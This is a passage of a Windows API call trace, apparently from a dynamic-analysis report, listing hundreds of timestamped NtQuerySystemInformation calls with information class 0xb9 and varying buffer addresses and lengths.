SystemInformation=0xf7a68fcf70, Length=0x28, ResultLength=0x0) [0280.337] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.337] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.337] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd050, Length=0x38, ResultLength=0x0) [0280.337] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fced0, Length=0x20, ResultLength=0x0) [0280.337] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fce50, Length=0x20, ResultLength=0x0) [0280.338] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.338] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fce50, Length=0x20, ResultLength=0x0) [0280.338] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.338] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fce50, Length=0x20, ResultLength=0x0) [0280.338] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.338] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.338] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.338] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.338] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd050, Length=0x38, ResultLength=0x0) [0280.338] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fced0, Length=0x20, ResultLength=0x0) [0280.338] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fce60, Length=0x20, ResultLength=0x0) [0280.338] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.338] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.338] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.338] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fce60, Length=0x20, ResultLength=0x0) [0280.338] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.338] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.339] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.339] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.339] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.339] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.343] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb00, Length=0x50, ResultLength=0x0) [0280.343] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.343] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb00, Length=0x50, ResultLength=0x0) [0280.343] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.343] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb00, Length=0x50, ResultLength=0x0) [0280.343] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc9f0, Length=0x50, ResultLength=0x0) [0280.343] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.343] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc9f0, Length=0x50, ResultLength=0x0) [0280.343] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.343] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc9f0, Length=0x50, ResultLength=0x0) [0280.343] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.344] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc9f0, Length=0x50, ResultLength=0x0) [0280.344] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.344] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc920, Length=0x38, ResultLength=0x0) [0280.345] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.346] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc750, Length=0x28, ResultLength=0x0) [0280.346] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.346] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.346] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc750, Length=0x28, ResultLength=0x0) [0280.346] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.346] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.346] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc750, Length=0x28, ResultLength=0x0) [0280.346] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.346] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.346] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc750, Length=0x28, ResultLength=0x0) [0280.346] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.346] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.346] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc7c0, Length=0x28, ResultLength=0x0) [0280.346] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.346] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.346] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc920, Length=0x38, ResultLength=0x0) [0280.346] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.347] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc840, Length=0x28, ResultLength=0x0) [0280.348] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.348] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.349] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.349] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc840, Length=0x28, ResultLength=0x0) [0280.349] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc6e0, Length=0x20, ResultLength=0x0) [0280.349] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc660, Length=0x20, ResultLength=0x0) [0280.349] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.349] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc660, Length=0x20, ResultLength=0x0) [0280.349] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.349] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc660, Length=0x20, ResultLength=0x0) [0280.349] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.349] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.349] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.349] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.349] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.349] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc920, Length=0x38, ResultLength=0x0) [0280.349] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.349] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc920, Length=0x38, ResultLength=0x0) [0280.349] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc7a0, Length=0x20, ResultLength=0x0) [0280.350] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc730, Length=0x20, ResultLength=0x0) [0280.350] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.350] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.350] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.350] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc730, Length=0x20, ResultLength=0x0) [0280.350] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.350] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.350] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.350] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.350] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.350] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.350] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.351] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb00, Length=0x50, ResultLength=0x0) [0280.351] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.351] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb00, Length=0x50, ResultLength=0x0) [0280.351] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.351] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb00, Length=0x50, ResultLength=0x0) [0280.351] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc9f0, Length=0x50, ResultLength=0x0) [0280.351] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.351] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc9f0, Length=0x50, ResultLength=0x0) [0280.351] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.351] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc9f0, Length=0x50, ResultLength=0x0) [0280.351] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.351] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc9f0, Length=0x50, ResultLength=0x0) [0280.352] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.352] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc920, Length=0x38, ResultLength=0x0) [0280.353] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.353] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc750, Length=0x28, ResultLength=0x0) [0280.353] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.353] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.354] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc750, Length=0x28, ResultLength=0x0) [0280.354] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.354] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.354] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc750, Length=0x28, ResultLength=0x0) [0280.354] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.354] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.354] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc750, Length=0x28, ResultLength=0x0) [0280.354] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.354] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.354] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc7c0, Length=0x28, ResultLength=0x0) [0280.354] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.354] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.354] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc920, Length=0x38, ResultLength=0x0) [0280.354] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.354] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc840, Length=0x28, ResultLength=0x0) [0280.356] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.356] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.356] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.357] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc840, Length=0x28, ResultLength=0x0) [0280.357] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc6e0, Length=0x20, ResultLength=0x0) [0280.357] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc660, Length=0x20, ResultLength=0x0) [0280.357] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.357] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc660, Length=0x20, ResultLength=0x0) [0280.357] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.357] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc660, Length=0x20, ResultLength=0x0) [0280.357] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.357] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.357] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.357] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.357] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.357] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc920, Length=0x38, ResultLength=0x0) [0280.357] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.357] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc920, Length=0x38, ResultLength=0x0) [0280.357] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc7a0, Length=0x20, ResultLength=0x0) [0280.357] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc730, Length=0x20, ResultLength=0x0) [0280.358] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.358] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.358] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.358] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc730, Length=0x20, ResultLength=0x0) [0280.358] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.358] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.370] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.370] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.370] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.370] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.370] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.371] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd0c0, Length=0x28, ResultLength=0x0) [0280.371] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd008, Length=0x28, ResultLength=0x0) [0280.371] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.371] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd008, Length=0x28, ResultLength=0x0) [0280.371] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.371] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd008, Length=0x28, ResultLength=0x0) [0280.371] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.371] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd008, Length=0x28, ResultLength=0x0) [0280.371] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.371] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd008, Length=0x28, ResultLength=0x0) [0280.372] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.372] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd008, Length=0x28, ResultLength=0x0) [0280.372] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.372] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd008, Length=0x28, ResultLength=0x0) [0280.372] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcf70, Length=0x20, ResultLength=0x0) [0280.372] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.372] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcf70, Length=0x20, ResultLength=0x0) [0280.372] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.372] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.372] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd008, Length=0x28, ResultLength=0x0) [0280.372] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.372] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.372] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.372] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcf80, Length=0x40, ResultLength=0x0) [0280.372] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.372] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcf80, Length=0x40, ResultLength=0x0) [0280.373] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.373] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.373] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.373] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.373] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.373] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.373] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fce30, Length=0x20, ResultLength=0x0) [0280.373] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.373] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fce30, Length=0x20, ResultLength=0x0) [0280.373] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.373] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.373] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.373] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.373] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcf80, Length=0x40, ResultLength=0x0) [0280.373] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.374] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcf80, Length=0x40, ResultLength=0x0) [0280.374] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.374] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcf80, Length=0x40, ResultLength=0x0) [0280.374] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcee0, Length=0x20, ResultLength=0x0) [0280.374] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.374] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcee0, Length=0x20, ResultLength=0x0) [0280.374] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.374] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcee0, Length=0x20, ResultLength=0x0) [0280.374] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.374] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.374] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcf80, Length=0x40, ResultLength=0x0) [0280.374] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcf10, Length=0x20, ResultLength=0x0) [0280.374] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fceb0, Length=0x20, ResultLength=0x0) [0280.374] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.374] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fceb0, Length=0x20, ResultLength=0x0) [0280.374] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.374] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.374] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.374] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcf80, Length=0x40, ResultLength=0x0) [0280.374] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.374] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcf80, Length=0x40, ResultLength=0x0) [0280.375] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.375] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcf80, Length=0x40, ResultLength=0x0) [0280.375] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.375] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcf80, Length=0x40, ResultLength=0x0) [0280.375] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fce58, Length=0x48, ResultLength=0x0) [0280.375] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.375] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fce58, Length=0x48, ResultLength=0x0) [0280.375] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.375] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fce58, Length=0x48, ResultLength=0x0) [0280.375] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.375] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fce58, Length=0x48, ResultLength=0x0) [0280.375] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcd90, Length=0x28, ResultLength=0x0) [0280.375] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.375] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcd90, Length=0x28, ResultLength=0x0) [0280.375] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.375] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.375] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fce58, Length=0x48, ResultLength=0x0) [0280.375] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.375] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fce58, Length=0x48, ResultLength=0x0) [0280.375] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.376] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fce58, Length=0x48, ResultLength=0x0) [0280.376] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcd90, Length=0x28, ResultLength=0x0) [0280.376] NtQuerySystemInformation (SystemInformationClass=0xb9, 